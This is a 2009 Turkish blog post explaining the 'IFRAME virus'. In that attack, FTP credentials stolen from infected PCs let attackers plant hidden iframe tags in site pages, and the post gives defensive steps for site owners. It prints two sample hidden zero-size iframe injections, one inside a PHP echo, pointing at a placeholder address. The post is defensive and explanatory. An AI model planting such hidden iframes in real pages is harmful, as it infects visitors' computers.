Internet 18 Ağustos 2009

IFRAME Virüsü Tehdit Ediyor

\"iframeBir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyorum.

IFRAME Virüsü nedir?

 Virüslü bilgisayarlardan; FTP girişi yapılan sitelerin index, default veya tüm dosyalara zararlı bir IFRAME kodu yerleştirilir ve sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırır. 

Zararlı IFRAME Virüsü, sitelere genellikle FTP üzerinden bulaşmaktadır. IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlar.

Peki Nasıl Bulaşır?

1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.

2. Bilgisayarınıza bulaştırılan virüsün amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı veya ftp şifrenizi çalmaktır. FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index, default veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iframe veya script tagı yerleştirir.

IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir. Dolayısıyla sitenizin ana sayfası olan index veya default dosyalarının yazma izinlerini kaldırmalısınız.

IFRAME kod örnekleri:

<IFRAME src=\'http://siteadresi/index.php\' style=\'border:0px solid gray;\' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo \”<IFRAME src=\”http://siteadresi\\123\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></IFRAME>\”;

Korunmak için Yapmanız Gerekenler:

1. FTP şifrenizi değiştiriniz.

2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.

3. FTP şifrenizi otomatik girişe ayarlamayın.

Bunu da Oku:  2014 Yılında 140 Milyon Yeni Virüs Dijital Dünyaya Salındı

4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz.

Sitelerinizi Gözden Geçirin

Sitenizdeki index, default dosyalarını bilgisayarınıza indirip html kodlarını gözden geçirin. Index veya default dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Yine de tedbirli davranarak diğer doslarınızın güncellenme tarihlerini gözden geçirin.

Zararlı kod bulaşmış dosyalarınız varsa temizleyin.

Yazar Bilgileri

Emrah emrah19may@hotmail.com
1981 Samsun doğumlu ve Gazi Üniversitesi, Bilgisayar ve Öğretim Teknolojileri Eğitimi mezunu. Bilişim Teknolojileri Öğretmeni olarak görev yapmakta olup DMOZ Editörü, Web-Grafik Tasarımı ve SEO eğitmeni.

Yorum Yap